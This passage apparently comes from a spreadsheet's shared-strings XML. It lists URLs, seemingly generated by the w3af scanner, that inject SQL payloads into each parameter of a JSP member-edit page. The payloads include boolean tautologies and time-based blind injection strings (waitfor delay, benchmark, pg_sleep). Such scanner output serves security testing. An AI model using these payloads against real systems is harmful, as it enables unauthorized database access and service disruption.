    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=3'+or+'3'='3&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=3'+and+'3'='4&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=3+or+3=3+&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=3+and+3=4+&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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frame30.&amp;email=6"+or+"6"="6&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=6"+and+"6"="7&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=6'+or+'6'='6&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=6'+and+'6'='7&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=6+or+6=6+&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=6+and+6=7+&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1;waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1);waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1));waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1';waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1');waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'));waitfor+delay+'0:0:5'--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1+or+benchmark(2500000,md5(1))&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1+or+pg_sleep(5)&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19"+or+"19"="19&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19"+and+"19"="20&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19'+or+'19'='19&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19'+and+'19'='20&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19+or+19=19+&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=19+and+19=20+&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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45"+or+"45"="45&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=45"+and+"45"="46&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=45'+or+'45'='45&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=45'+and+'45'='46&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=45+or+45=45+&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=45+and+45=46+&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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5"+or+"55"="55&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=55"+and+"55"="56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=55'+or+'55'='55&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=55'+and+'55'='56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=55+or+55=55+&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=55+and+55=56+&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=4"+or+"4"="4&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=4"+and+"4"="5&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=4'+or+'4'='4&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
